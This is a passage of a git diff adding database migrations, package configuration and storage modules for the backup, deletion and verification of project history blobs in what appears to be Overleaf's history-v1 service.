NOT NULL AND start_version >= 0) + NOT VALID + `) + await knex.raw(` + ALTER TABLE chunks + VALIDATE CONSTRAINT chunks_start_version_non_negative + `) + await knex.raw(` + CREATE UNIQUE INDEX CONCURRENTLY index_chunks_on_doc_id_and_start_version + ON chunks (doc_id, start_version) + `) + await knex.raw(` + ALTER TABLE chunks + ADD UNIQUE USING INDEX index_chunks_on_doc_id_and_start_version + `) +} + +exports.down = async function (knex) { + await knex.raw(` + ALTER TABLE chunks + DROP CONSTRAINT IF EXISTS index_chunks_on_doc_id_and_start_version + `) + await knex.raw(` + DROP INDEX IF EXISTS index_chunks_on_doc_id_and_start_version + `) + await knex.raw(` + ALTER TABLE chunks + DROP CONSTRAINT IF EXISTS chunks_start_version_non_negative + `) +} diff --git a/services/history-v1/migrations/20221118213808_delete_global_blobs_table.js b/services/history-v1/migrations/20221118213808_delete_global_blobs_table.js new file mode 100644 index 0000000..eb76dff --- /dev/null +++ b/services/history-v1/migrations/20221118213808_delete_global_blobs_table.js @@ -0,0 +1,7 @@ +exports.up = async function (knex) { + await knex.raw(`DROP TABLE IF EXISTS blobs`) +} + +exports.down = function (knex) { + // Not reversible +} diff --git a/services/history-v1/migrations/20250415210802_add_chunks_closed.js b/services/history-v1/migrations/20250415210802_add_chunks_closed.js new file mode 100644 index 0000000..b5c1d57 --- /dev/null +++ b/services/history-v1/migrations/20250415210802_add_chunks_closed.js @@ -0,0 +1,27 @@ +// @ts-check + +/** + * @import { Knex } from "knex" + */ + +/** + * @param { Knex } knex + * @returns { Promise<void> } + */ +exports.up = async function (knex) { + await knex.raw(` + ALTER TABLE chunks + ADD COLUMN closed BOOLEAN NOT NULL DEFAULT FALSE + `) +} + +/** + * @param { Knex } knex + * @returns { Promise<void> } + */ +exports.down = async function (knex) { + await knex.raw(` + ALTER TABLE chunks + DROP COLUMN closed + `) +} diff --git a/services/history-v1/package.json b/services/history-v1/package.json new file mode 100644 index 0000000..3219be9 --- /dev/null +++ b/services/history-v1/package.json @@ -0,0 +1,76 @@ +{ + "name": "overleaf-editor", + "version": "1.0.0", + "description": "Overleaf Editor.", + "author": "", + "license": "Proprietary", + "private": true, + "dependencies": { + "@google-cloud/secret-manager": "^5.6.0", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/mongo-utils": "*", + "@overleaf/o-error": "*", + "@overleaf/object-persistor": "*", + "@overleaf/promise-utils": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "@overleaf/stream-utils": "^0.1.0", + "archiver": "^5.3.0", + "basic-auth": "^2.0.1", + "bluebird": "^3.7.2", + "body-parser": "^1.20.3", + "bull": "^4.16.5", + "bunyan": "^1.8.12", + "check-types": "^11.1.2", + "command-line-args": "^3.0.3", + "config": "^1.19.0", + "express": "^4.21.2", + "fs-extra": "^9.0.1", + "generic-pool": "^2.1.1", + "helmet": "^3.22.0", + "http-status": "^1.4.2", + "jsonwebtoken": "^9.0.0", + "knex": "^2.4.0", + "lodash": "^4.17.19", + "mongodb": "6.12.0", + "overleaf-editor-core": "*", + "p-limit": "^6.2.0", + "pg": "^8.7.1", + "pg-query-stream": "^4.2.4", + "swagger-tools": "^0.10.4", + "temp": "^0.8.3", + "throng": "^4.0.0", + "tsscmp": "^1.0.6", + "utf-8-validate": "^5.0.4" + }, + "devDependencies": { + "benny": "^3.7.1", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "chai-exclude": "^2.1.1", + "mocha": "^11.1.0", + "node-fetch": "^2.7.0", + "sinon": "^9.0.2", + "swagger-client": "^3.10.0", + "typescript": "^5.0.4", + "yauzl": "^2.9.1" + }, + "scripts": { + "start": "node app.js", + "lint": "eslint --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix .", + "format": "prettier --list-different $PWD/'**/*.*js'", + "format:fix": "prettier --write $PWD/'**/*.*js'", + "test:unit": "npm run test:unit:_run -- --grep=$MOCHA_GREP", + "test:acceptance": "npm run test:acceptance:_run -- --grep=$MOCHA_GREP", + "test:unit:_run": "mocha --recursive --reporter spec $@ test/unit/js", + "test:acceptance:_run": "mocha --recursive --reporter spec --timeout 15000 --exit $@ test/acceptance/js", + "nodemon": "node --watch app.js", + "migrate": "knex migrate:latest", + "delete_old_chunks": "node storage/tasks/delete_old_chunks.js", + "fix_duplicate_versions": "node storage/tasks/fix_duplicate_versions.js", + "benchmarks": "node benchmarks/index.js", + "types:check": "tsc --noEmit" + } +} diff --git a/services/history-v1/storage/index.js b/services/history-v1/storage/index.js new file mode 100644 index 0000000..5fe283a --- /dev/null +++ b/services/history-v1/storage/index.js @@ -0,0 +1,25 @@ +exports.BatchBlobStore = require('./lib/batch_blob_store') +exports.blobHash = require('./lib/blob_hash') +exports.HashCheckBlobStore = require('./lib/hash_check_blob_store') +exports.chunkBuffer = require('./lib/chunk_buffer') +exports.chunkStore = require('./lib/chunk_store') +exports.historyStore = require('./lib/history_store').historyStore +exports.knex = require('./lib/knex') +exports.mongodb = require('./lib/mongodb') +exports.redis = require('./lib/redis') +exports.persistChanges = require('./lib/persist_changes') +exports.persistor = require('./lib/persistor') +exports.ProjectArchive = require('./lib/project_archive') +exports.streams = require('./lib/streams') +exports.temp = require('./lib/temp') +exports.zipStore = require('./lib/zip_store') + +const { BlobStore, loadGlobalBlobs } = require('./lib/blob_store') +exports.BlobStore = BlobStore +exports.loadGlobalBlobs = loadGlobalBlobs + +const { InvalidChangeError } = require('./lib/errors') +exports.InvalidChangeError = InvalidChangeError + +const { ChunkVersionConflictError } = require('./lib/chunk_store/errors') +exports.ChunkVersionConflictError = ChunkVersionConflictError diff --git a/services/history-v1/storage/lib/assert.js b/services/history-v1/storage/lib/assert.js new file mode 100644 index 0000000..91f24da --- /dev/null +++ b/services/history-v1/storage/lib/assert.js @@ -0,0 +1,76 @@ +'use strict' + +const OError = require('@overleaf/o-error') + +const check = require('check-types') +const { Blob } = require('overleaf-editor-core') + +const assert = check.assert + +const MONGO_ID_REGEXP = /^[0-9a-f]{24}$/ +const POSTGRES_ID_REGEXP = /^[1-9][0-9]{0,9}$/ +const MONGO_OR_POSTGRES_ID_REGEXP = /^([0-9a-f]{24}|[1-9][0-9]{0,9})$/ + +function transaction(transaction, message) { + assert.function(transaction, message) +} + +function blobHash(arg, message) { + try { + assert.match(arg, Blob.HEX_HASH_RX, message) + } catch (error) { + throw OError.tag(error, message, { arg }) + } +} + +/** + * A project id is a string that contains either an integer (for projects stored in Postgres) or 24 + * hex digits (for projects stored in Mongo) + */ +function projectId(arg, message) { + try { + assert.match(arg, MONGO_OR_POSTGRES_ID_REGEXP, message) + } catch (error) { + throw OError.tag(error, message, { arg }) + } +} + +/** + * A chunk id is a string that contains either an integer (for projects stored in Postgres) or 24 + * hex digits (for projects stored in Mongo) + */ +function chunkId(arg, message) { + try { + assert.match(arg, MONGO_OR_POSTGRES_ID_REGEXP, message) + } catch (error) { + throw OError.tag(error, message, { arg }) + } +} + +function mongoId(arg, message) { + try { + assert.match(arg, MONGO_ID_REGEXP, message) + } catch (error) { + throw OError.tag(error, message, { arg }) + } +} + +function postgresId(arg, message) { + try { + assert.match(arg, POSTGRES_ID_REGEXP, message) + } catch (error) { + throw OError.tag(error, message, { arg }) + } +} + +module.exports = { + ...assert, + transaction, + blobHash, + projectId, + chunkId, + mongoId, + postgresId, + MONGO_ID_REGEXP, + POSTGRES_ID_REGEXP, +} diff --git a/services/history-v1/storage/lib/backupBlob.mjs b/services/history-v1/storage/lib/backupBlob.mjs new file mode 100644 index 0000000..8ae1a6a --- /dev/null +++ b/services/history-v1/storage/lib/backupBlob.mjs @@ -0,0 +1,251 @@ +// @ts-check +import { backupPersistor, projectBlobsBucket } from './backupPersistor.mjs' +import { GLOBAL_BLOBS, makeProjectKey, BlobStore } from './blob_store/index.js' +import Stream from 'node:stream' +import fs from 'node:fs' +import Crypto from 'node:crypto' +import assert from './assert.js' +import { backedUpBlobs, projects } from './mongodb.js' +import { Binary, ObjectId } from 'mongodb' +import logger from '@overleaf/logger/logging-manager.js' +import { AlreadyWrittenError } from '@overleaf/object-persistor/src/Errors.js' +import metrics from '@overleaf/metrics' +import zLib from 'node:zlib' +import Path from 'node:path' + +const HIGHWATER_MARK = 1024 * 1024 + +/** + * @typedef {import("overleaf-editor-core").Blob} Blob + */ + +/** + * @typedef {import("@overleaf/object-persistor/src/PerProjectEncryptedS3Persistor").CachedPerProjectEncryptedS3Persistor} CachedPerProjectEncryptedS3Persistor + */ + +/** + * Increment a metric to record the outcome of a backup operation. + * + * @param {"success"|"failure"|"skipped"} status + * @param {"global"|"already_backed_up"|"none"} reason + */ +function recordBackupConclusion(status, reason = 'none') { + metrics.inc('blob_backed_up', 1, { status, reason }) +} + +/** + * Downloads a blob to a specified directory + * + * @param {string} historyId - The history ID of the project the blob belongs to + * @param {Blob} blob - The blob to download + * @param {string} tmpDir - The directory path where the blob will be downloaded + * @returns {Promise<string>} The full path where the blob was downloaded + */ +export async function downloadBlobToDir(historyId, blob, tmpDir) { + const blobStore = new BlobStore(historyId) + const blobHash = blob.getHash() + const src = await blobStore.getStream(blobHash) + const filePath = Path.join(tmpDir, `${historyId}-${blobHash}`) + try { + const dst = fs.createWriteStream(filePath, { + highWaterMark: HIGHWATER_MARK, + flags: 'wx', + }) + await Stream.promises.pipeline(src, dst) + return filePath + } catch (error) { + try { + await fs.promises.unlink(filePath) + } catch {} + throw error + } +} + +/** + * Performs the actual upload of the blob to the backup storage. + * + * @param {string} historyId - The history ID of the project the blob belongs to + * @param {Blob} blob - The blob being uploaded + * @param {string} path - The path to the file to upload (should have been stored on disk already) + * @return {Promise<void>} + */ +export async function uploadBlobToBackup(historyId, blob, path, persistor) { + const md5 = Crypto.createHash('md5') + const filePathCompressed = path + '.gz' + let backupSource + let contentEncoding + let size + try { + if (blob.getStringLength()) { + backupSource = filePathCompressed + contentEncoding = 'gzip' + size = 0 + await Stream.promises.pipeline( + fs.createReadStream(path, { highWaterMark: HIGHWATER_MARK }), + zLib.createGzip(), + async function* (source) { + for await (const chunk of source) { + size += chunk.byteLength + md5.update(chunk) + yield chunk + } + }, + fs.createWriteStream(filePathCompressed, { + highWaterMark: HIGHWATER_MARK, + }) + ) + } else { + backupSource = path + size = blob.getByteLength() + await Stream.promises.pipeline( + fs.createReadStream(path, { highWaterMark: HIGHWATER_MARK }), + md5 + ) + } + const key = makeProjectKey(historyId, blob.getHash()) + await persistor.sendStream( + projectBlobsBucket, + key, + fs.createReadStream(backupSource, { highWaterMark: HIGHWATER_MARK }), + { + contentEncoding, + contentType: 'application/octet-stream', + contentLength: size, + sourceMd5: md5.digest('hex'), + ifNoneMatch: '*', + } + ) + } finally { + if (backupSource === filePathCompressed) { + try { + await fs.promises.rm(filePathCompressed, { force: true }) + } catch {} + } + } +} + +/** + * Converts a legacy (postgres) historyId to a mongo projectId + * + * @param {string} historyId + * @return {Promise<string>} + * @private + */ +async function _convertLegacyHistoryIdToProjectId(historyId) { + const project = await projects.findOne( + { 'overleaf.history.id': parseInt(historyId) }, + { projection: { _id: 1 } } + ) + + if (!project?._id) { + throw new Error('Did not find project for history id') + } + + return project?._id?.toString() +} + +/** + * Records that a blob was backed up for a project. + * + * @param {string} projectId - projectId for a project (mongo format) + * @param {string} hash + * @return {Promise<void>} + */ +export async function storeBlobBackup(projectId, hash) { + await backedUpBlobs.updateOne( + { _id: new ObjectId(projectId) }, + { $addToSet: { blobs: new Binary(Buffer.from(hash, 'hex')) } }, + { upsert: true } + ) +} + +/** + * Determine whether a specific blob has been backed up in this project. + * + * @param {string} projectId + * @param {string} hash + * @return {Promise<*>} + * @private + */ +export async function _blobIsBackedUp(projectId, hash) { + const blobs = await backedUpBlobs.findOne( + { + _id: new ObjectId(projectId), + blobs: new Binary(Buffer.from(hash, 'hex')), + }, + { projection: { _id: 1 } } + ) + return blobs?._id +} + +/** + * Back up a blob to the global storage and record that it was backed up. + * + * @param {string} historyId - history ID for a project (can be postgres format or mongo format) + * @param {Blob} blob - The blob that is being backed up + * @param {string} tmpPath - The path to a temporary file storing the contents of the blob. + * @param {CachedPerProjectEncryptedS3Persistor} [persistor] - The persistor to use (optional) + * @return {Promise<void>} + */ +export async function backupBlob(historyId, blob, tmpPath, persistor) { + const hash = blob.getHash() + + let projectId = historyId + if (assert.POSTGRES_ID_REGEXP.test(historyId)) { + projectId = await _convertLegacyHistoryIdToProjectId(historyId) + } + + const globalBlob = GLOBAL_BLOBS.get(hash) + + if (globalBlob && !globalBlob.demoted) { + recordBackupConclusion('skipped', 'global') + logger.debug({ projectId, hash }, 'Blob is global - skipping backup') + return + } + + try { + if (await _blobIsBackedUp(projectId, hash)) { + recordBackupConclusion('skipped', 'already_backed_up') + logger.debug( + { projectId, hash }, + 'Blob already backed up - skipping backup' + ) + return + } + } catch (error) { + logger.warn({ error }, 'Failed to check if blob is backed up') + // We'll try anyway - we'll catch the error if it was backed up + } + // If we weren't passed a persistor for this project, create one. + // This will fetch the key from AWS, so it's prefereable to use + // the same persistor for all blobs in a project where possible. + if (!persistor) { + logger.debug( + { historyId, hash }, + 'warning: persistor not passed to backupBlob' + ) + } + persistor ??= await backupPersistor.forProject( + projectBlobsBucket, + makeProjectKey(historyId, '') + ) + try { + logger.debug({ projectId, hash }, 'Starting blob backup') + await uploadBlobToBackup(historyId, blob, tmpPath, persistor) + await storeBlobBackup(projectId, hash) + recordBackupConclusion('success') + } catch (error) { + if (error instanceof AlreadyWrittenError) { + logger.debug({ error, projectId, hash }, 'Blob already backed up') + // record that we backed it up already + await storeBlobBackup(projectId, hash) + recordBackupConclusion('failure', 'already_backed_up') + return + } + // eventually queue this for retry - for now this will be fixed by running the script + recordBackupConclusion('failure') + logger.warn({ error, projectId, hash }, 'Failed to upload blob to backup') + } finally { + logger.debug({ projectId, hash }, 'Ended blob backup') + } +} diff --git a/services/history-v1/storage/lib/backupDeletion.mjs b/services/history-v1/storage/lib/backupDeletion.mjs new file mode 100644 index 0000000..ef50609 --- /dev/null +++ b/services/history-v1/storage/lib/backupDeletion.mjs @@ -0,0 +1,93 @@ +// @ts-check +import { callbackify } from 'util' +import { ObjectId } from 'mongodb' +import config from 'config' +import OError from '@overleaf/o-error' +import { db } from './mongodb.js' +import projectKey from './project_key.js' +import chunkStore from '../lib/chunk_store/index.js' +import { + backupPersistor, + chunksBucket, + projectBlobsBucket, +} from './backupPersistor.mjs' + +const MS_PER_DAY = 24 * 60 * 60 * 1000 +const EXPIRE_PROJECTS_AFTER_MS = + parseInt(config.get('minSoftDeletionPeriodDays'), 10) * MS_PER_DAY +const deletedProjectsCollection = db.collection('deletedProjects') + +/** + * @param {string} historyId + * @return {Promise<boolean>} + */ +async function projectHasLatestChunk(historyId) { + const chunk = await chunkStore.getBackend(historyId).getLatestChunk(historyId) + return chunk != null +} + +export class NotReadyToDelete extends OError {} + +/** + * @param {string} projectId + * @return {Promise<void>} + */ +async function deleteProjectBackup(projectId) { + const deletedProject = await deletedProjectsCollection.findOne( + { 'deleterData.deletedProjectId': new ObjectId(projectId) }, + { + projection: { + 'deleterData.deletedProjectOverleafHistoryId': 1, + 'deleterData.deletedAt': 1, + }, + } + ) + if (!deletedProject) { + throw new NotReadyToDelete('refusing to delete non-deleted project') + } + const expiresAt = + deletedProject.deleterData.deletedAt.getTime() + EXPIRE_PROJECTS_AFTER_MS + if (expiresAt > Date.now()) { + throw new NotReadyToDelete('refusing to delete non-expired project') + } + + const historyId = + deletedProject.deleterData.deletedProjectOverleafHistoryId?.toString() + if (!historyId) { + throw new NotReadyToDelete( + 'refusing to delete project with unknown historyId' + ) + } + + if (await projectHasLatestChunk(historyId)) { + throw new NotReadyToDelete( + 'refusing to delete project with remaining chunks' + ) + } + + const prefix = projectKey.format(historyId) + '/' + await backupPersistor.deleteDirectory(chunksBucket, prefix) + await backupPersistor.deleteDirectory(projectBlobsBucket, prefix) +} + +export async function healthCheck() { + const HEALTH_CHECK_PROJECTS = JSON.parse(config.get('healthCheckProjects')) + if (HEALTH_CHECK_PROJECTS.length !== 2) { + throw new Error('expected 2 healthCheckProjects') + } + if (!HEALTH_CHECK_PROJECTS.some(id => id.length === 24)) { + throw new Error('expected mongo id in healthCheckProjects') + } + if (!HEALTH_CHECK_PROJECTS.some(id => id.length < 24)) { + throw new Error('expected postgres id in healthCheckProjects') + } + + for (const historyId of HEALTH_CHECK_PROJECTS) { + if (!(await projectHasLatestChunk(historyId))) { + throw new Error(`project has no history: ${historyId}`) + } + } +} + +export const healthCheckCb = callbackify(healthCheck) +export const deleteProjectBackupCb = callbackify(deleteProjectBackup) diff --git a/services/history-v1/storage/lib/backupGenerator.mjs b/services/history-v1/storage/lib/backupGenerator.mjs new file mode 100644 index 0000000..4c18929 --- /dev/null +++ b/services/history-v1/storage/lib/backupGenerator.mjs @@ -0,0 +1,152 @@ +/** + * Provides a generator function to back up project chunks and blobs. + */ + +import chunkStore from './chunk_store/index.js' + +import { + GLOBAL_BLOBS, // NOTE: must call loadGlobalBlobs() before using this + BlobStore, +} from './blob_store/index.js' + +import assert from './assert.js' + +async function lookBehindForSeenBlobs( + projectId, + chunk, + lastBackedUpVersion, + seenBlobs +) { + if (chunk.startVersion === 0) { + return // this is the first chunk, no need to check for blobs in the previous chunk + } + if (chunk.startVersion > 0 && lastBackedUpVersion > chunk.startVersion) { + return // the snapshot in this chunk has already been backed up + } + if ( + chunk.startVersion > 0 && + lastBackedUpVersion === chunk.startVersion // same as previousChunk.endVersion + ) { + // the snapshot in this chunk has not been backed up + // so we find the set of backed up blobs from the previous chunk + const previousChunk = await chunkStore.loadAtVersion( + projectId, + lastBackedUpVersion + ) + const previousChunkHistory = previousChunk.getHistory() + previousChunkHistory.findBlobHashes(seenBlobs) + } +} + +/** + * Records blob hashes that have been previously seen in a chunk's history. + * + * @param {Object} chunk - The chunk containing history data + * @param {number} currentBackedUpVersion - The version number that has been backed up + * @param {Set<string>} seenBlobs - Set to collect previously seen blob hashes + * @returns {void} + */ +function recordPreviouslySeenBlobs(chunk, currentBackedUpVersion, seenBlobs) { + // We need to look at the chunk and decide how far we have backed up. + // If we have not backed up this chunk at all, we need to backup the blobs + // in the snapshot. Otherwise we need to backup the blobs in the changes + // that have occurred since the last backup. + const history = chunk.getHistory() + const startVersion = chunk.getStartVersion() + if (currentBackedUpVersion === 0) { + // If we have only backed up version 0 (i.e. the first change) + // then that includes the initial snapshot, so we consider + // the blobs of the initial snapshot as seen. If the project + // has not been backed up at all then currentBackedUpVersion + // will be undefined. + history.snapshot.findBlobHashes(seenBlobs) + } else if (currentBackedUpVersion > startVersion) { + history.snapshot.findBlobHashes(seenBlobs) + for (let i = 0; i < currentBackedUpVersion - startVersion; i++) { + history.changes[i].findBlobHashes(seenBlobs) + } + } +} + +/** + * Collects new blob objects that need to be backed up from a given chunk. + * + * @param {Object} chunk - The chunk object containing history data + * @param {Object} blobStore - Storage interface for retrieving blobs + * @param {Set<string>} seenBlobs - Set of blob hashes that have already been processed + * @returns {Promise<Object[]>} Array of blob objects that need to be backed up + * @throws {Error} If blob retrieval fails + */ +async function collectNewBlobsForBackup(chunk, blobStore, seenBlobs) { + /** @type {Set<string>} */ + const blobHashes = new Set() + const history = chunk.getHistory() + // Get all the blobs in this chunk, then exclude the seenBlobs and global blobs + history.findBlobHashes(blobHashes) + const blobsToBackup = await blobStore.getBlobs( + [...blobHashes].filter( + hash => + hash && + !seenBlobs.has(hash) && + (!GLOBAL_BLOBS.has(hash) || GLOBAL_BLOBS.get(hash).demoted) + ) + ) + return blobsToBackup +} + +/** + * Asynchronously generates backups for a project based on provided versions. + * @param {string} projectId - The ID of the project's history to back up. + * @param {number} lastBackedUpVersion - The last version that was successfully backed up. + * @yields {AsyncGenerator<{ chunkRecord: object, chunkToBackup: object, chunkBuffer: Buffer, blobsToBackup: object[] }>} + * Yields chunk records and corresponding data needed for backups. + */ +export async function* backupGenerator(projectId, lastBackedUpVersion) { + assert.projectId(projectId, 'bad projectId') + assert.maybe.integer(lastBackedUpVersion, 'bad lastBackedUpVersion') + + const blobStore = new BlobStore(projectId) + + /** @type {Set<string>} */ + const seenBlobs = new Set() // records the blobs that are already backed up + + const firstPendingVersion = + lastBackedUpVersion >= 0 ? lastBackedUpVersion + 1 : 0 + let isStartingChunk = true + let currentBackedUpVersion = lastBackedUpVersion + const chunkRecordIterator = chunkStore.getProjectChunksFromVersion( + projectId, + firstPendingVersion + ) + + for await (const chunkRecord of chunkRecordIterator) { + const { chunk, chunkBuffer } = await chunkStore.loadByChunkRecord( + projectId, + chunkRecord + ) + + if (isStartingChunk) { + await lookBehindForSeenBlobs( + projectId, + chunkRecord, + lastBackedUpVersion, + seenBlobs + ) + isStartingChunk = false + } + + recordPreviouslySeenBlobs(chunk, currentBackedUpVersion, seenBlobs) + + const blobsToBackup = await collectNewBlobsForBackup( + chunk, + blobStore, + seenBlobs + ) + + yield { chunkRecord, chunkToBackup: chunk, chunkBuffer, blobsToBackup } + + // After we generate a backup of this chunk, mark the backed up blobs as seen + blobsToBackup.forEach(blob => seenBlobs.add(blob.getHash())) + currentBackedUpVersion = chunkRecord.endVersion + } +} diff --git a/services/history-v1/storage/lib/backupPersistor.mjs b/services/history-v1/storage/lib/backupPersistor.mjs new file mode 100644 index 0000000..8f80e5f --- /dev/null +++ b/services/history-v1/storage/lib/backupPersistor.mjs @@ -0,0 +1,121 @@ +// @ts-check +import fs from 'node:fs' +import Path from 'node:path' +import _ from 'lodash' +import config from 'config' +import { SecretManagerServiceClient } from '@google-cloud/secret-manager' +import OError from '@overleaf/o-error' +import { + PerProjectEncryptedS3Persistor, + RootKeyEncryptionKey, +} from '@overleaf/object-persistor/src/PerProjectEncryptedS3Persistor.js' +import { HistoryStore } from './history_store.js' + +const persistorConfig = _.cloneDeep(config.get('backupPersistor')) +const { chunksBucket, deksBucket, globalBlobsBucket, projectBlobsBucket } = + config.get('backupStore') + +export { chunksBucket, globalBlobsBucket, projectBlobsBucket } + +function convertKey(key, convertFn) { + if (_.has(persistorConfig, key)) { + _.update(persistorConfig, key, convertFn) + } +} + +convertKey('s3SSEC.httpOptions.timeout', s => parseInt(s, 10)) +convertKey('s3SSEC.maxRetries', s => parseInt(s, 10)) +convertKey('s3SSEC.pathStyle', s => s === 'true') +// array of CA, either inlined or on disk +convertKey('s3SSEC.ca', s => + JSON.parse(s).map(ca => (ca.startsWith('/') ? fs.readFileSync(ca) : ca)) +) + +/** @type {() => Promise<string>} */ +let getRawRootKeyEncryptionKeys + +if ((process.env.NODE_ENV || 'production') === 'production') { + ;[persistorConfig.s3SSEC.key, persistorConfig.s3SSEC.secret] = ( + await loadFromSecretsManager( + process.env.BACKUP_AWS_CREDENTIALS || '', + 'BACKUP_AWS_CREDENTIALS' + ) + ).split(':') + getRawRootKeyEncryptionKeys = () => + loadFromSecretsManager( + persistorConfig.keyEncryptionKeys, + 'BACKUP_KEY_ENCRYPTION_KEYS' + ) +} else { + getRawRootKeyEncryptionKeys = () => persistorConfig.keyEncryptionKeys +} + +export const DELETION_ONLY = persistorConfig.keyEncryptionKeys === 'none' +if (DELETION_ONLY) { + // For Backup-deleter; should not encrypt or read data; deleting does not need key. + getRawRootKeyEncryptionKeys = () => new Promise(_resolve => {}) +} + +const PROJECT_FOLDER_REGEX = + /^\d{3}\/\d{3}\/\d{3,}\/|[0-9a-f]{3}\/[0-9a-f]{3}\/[0-9a-f]{18}\/$/ + +/** + * @param {string} bucketName + * @param {string} path + * @return {string} + */ +export function pathToProjectFolder(bucketName, path) { + switch (bucketName) { + case deksBucket: + case chunksBucket: + case projectBlobsBucket: + const projectFolder = Path.join(...path.split('/').slice(0, 3)) + '/' + if (!PROJECT_FOLDER_REGEX.test(projectFolder)) { + throw new OError('invalid project folder', { bucketName, path }) + } + return projectFolder + default: + throw new Error(`${bucketName} does not store per-project files`) + } +} + +/** + * @param {string} name + * @param {string} label + * @return {Promise<string>} + */ +async function loadFromSecretsManager(name, label) { + const client = new SecretManagerServiceClient() + const [version] = await client.accessSecretVersion({ name }) + if (!version.payload?.data) throw new Error(`empty secret: ${label}`) + return version.payload.data.toString() +} + +async function getRootKeyEncryptionKeys() { + return JSON.parse(await getRawRootKeyEncryptionKeys()).map( + ({ key, salt }) => { + return new RootKeyEncryptionKey( + Buffer.from(key, 'base64'), + Buffer.from(salt, 'base64') + ) + } + ) +} + +export const backupPersistor = new PerProjectEncryptedS3Persistor({ + ...persistorConfig.s3SSEC, + disableMultiPartUpload: true, + dataEncryptionKeyBucketName: deksBucket, + pathToProjectFolder, + getRootKeyEncryptionKeys, + storageClass: { + [deksBucket]: 'STANDARD', + [chunksBucket]: persistorConfig.tieringStorageClass, + [projectBlobsBucket]: persistorConfig.tieringStorageClass, + }, +}) + +export const backupHistoryStore = new HistoryStore( + backupPersistor, + chunksBucket +) diff --git a/services/history-v1/storage/lib/backupVerifier.mjs b/services/history-v1/storage/lib/backupVerifier.mjs new file mode 100644 index 0000000..14b84cd --- /dev/null +++ b/services/history-v1/storage/lib/backupVerifier.mjs @@ -0,0 +1,216 @@ +// @ts-check +import OError from '@overleaf/o-error' +import chunkStore from '../lib/chunk_store/index.js' +import { + backupPersistor, + chunksBucket, + projectBlobsBucket, +} from './backupPersistor.mjs' +import { Blob, Chunk, History } from 'overleaf-editor-core' +import { BlobStore, GLOBAL_BLOBS, makeProjectKey } from './blob_store/index.js' +import blobHash from './blob_hash.js' +import { NotFoundError } from '@overleaf/object-persistor/src/Errors.js' +import logger from '@overleaf/logger' +import path from 'node:path' +import projectKey from './project_key.js' +import streams from './streams.js' +import objectPersistor from '@overleaf/object-persistor' +import { getEndDateForRPO } from '../../backupVerifier/utils.mjs' + +/** + * @typedef {import("@overleaf/object-persistor/src/PerProjectEncryptedS3Persistor.js").CachedPerProjectEncryptedS3Persistor} CachedPerProjectEncryptedS3Persistor + */ + +/** + * @param {string} historyId + * @param {string} hash + */ +export async function verifyBlob(historyId, hash) { + return await verifyBlobs(historyId, [hash]) +} + +/** + * + * @param {string} historyId + * @return {Promise<CachedPerProjectEncryptedS3Persistor>} + */ +async function getProjectPersistor(historyId) { + try { + return await backupPersistor.forProjectRO( + projectBlobsBucket, + makeProjectKey(historyId, '') + ) + } catch (err) { + if (err instanceof NotFoundError) { + throw new BackupCorruptedError('dek does not exist', {}, err) + } + throw err + } +} + +/** + * @param {string} historyId + * @param {Array<string>} hashes + * @param {CachedPerProjectEncryptedS3Persistor} [projectCache] + */ +export async function verifyBlobs(historyId, hashes, projectCache) { + if (hashes.length === 0) throw new Error('bug: empty hashes') + + if (!projectCache) { + projectCache = await getProjectPersistor(historyId) + } + const blobStore = new BlobStore(historyId) + for (const hash of hashes) { + const path = makeProjectKey(historyId, hash) + const blob = await blobStore.getBlob(hash) + if (!blob) throw new Blob.NotFoundError(hash) + let stream + try { + stream = await projectCache.getObjectStream(projectBlobsBucket, path, { + autoGunzip: true, + }) + } catch (err) { + if (err instanceof NotFoundError) { + throw new BackupCorruptedMissingBlobError('missing blob', { + path, + hash, + }) + } + throw err + } + const backupHash = await blobHash.fromStream(blob.getByteLength(), stream) + if (backupHash !== hash) { + throw new BackupCorruptedInvalidBlobError( + 'hash mismatch for backed up blob', + { + path, + hash, + backupHash, + } + ) + } + } +} + +/** + * @param {string} historyId + * @param {Date} [endTimestamp] + */ +export async function verifyProjectWithErrorContext( + historyId, + endTimestamp = getEndDateForRPO() +) { + try { + await verifyProject(historyId, endTimestamp) + } catch (err) { + // @ts-ignore err is Error instance + throw OError.tag(err, 'verifyProject', { historyId, endTimestamp }) + } +} + +/** + * + * @param {string} historyId + * @param {number} startVersion + * @param {CachedPerProjectEncryptedS3Persistor} backupPersistorForProject + * @return {Promise<any>} + */ +async function loadChunk(historyId, startVersion, backupPersistorForProject) { + const key = path.join( + projectKey.format(historyId), + projectKey.pad(startVersion) + ) + try { + const buf = await streams.gunzipStreamToBuffer( + await backupPersistorForProject.getObjectStream(chunksBucket, key) + ) + return JSON.parse(buf.toString('utf-8')) + } catch (err) { + if (err instanceof objectPersistor.Errors.NotFoundError) { + throw new Chunk.NotPersistedError(historyId) + } + if (err instanceof Error) { + throw OError.tag(err, 'Failed to load chunk', { historyId, startVersion }) + } + throw err + } +} + +/** + * @param {string} historyId + * @param {Date} endTimestamp + */ +export async function verifyProject(historyId, endTimestamp) { + const backend = chunkStore.getBackend(historyId) + const [first, last] = await Promise.all([ + backend.getFirstChunkBeforeTimestamp(historyId, endTimestamp), + backend.getLastActiveChunkBeforeTimestamp(historyId, endTimestamp), + ]) + + const chunksRecordsToVerify = [ + { + chunkId: first.id, + chunkLabel: 'first', + }, + ] + if (first.startVersion !== last.startVersion) { + chunksRecordsToVerify.push({ + chunkId: last.id, + chunkLabel: 'last before RPO', + }) + } + + const projectCache = await getProjectPersistor(historyId) + + const chunks = await Promise.all( + chunksRecordsToVerify.map(async chunk => { + try { + return History.fromRaw( + await loadChunk(historyId, chunk.startVersion, projectCache) + ) + } catch (err) { + if (err instanceof Chunk.NotPersistedError) { + throw new BackupRPOViolationChunkNotBackedUpError( + 'BackupRPOviolation: chunk not backed up', + chunk + ) + } + throw err + } + }) + ) + const seenBlobs = new Set() + const blobsToVerify = [] + for (const chunk of chunks) { + /** @type {Set<string>} */ + const chunkBlobs = new Set() + chunk.findBlobHashes(chunkBlobs) + let hasAddedBlobFromThisChunk = false + for (const blobHash of chunkBlobs) { + if (seenBlobs.has(blobHash)) continue // old blob + if (GLOBAL_BLOBS.has(blobHash)) continue // global blob + seenBlobs.add(blobHash) + if (!hasAddedBlobFromThisChunk) { + blobsToVerify.push(blobHash) + hasAddedBlobFromThisChunk = true + } + } + } + if (blobsToVerify.length === 0) { + logger.debug( + { + historyId, 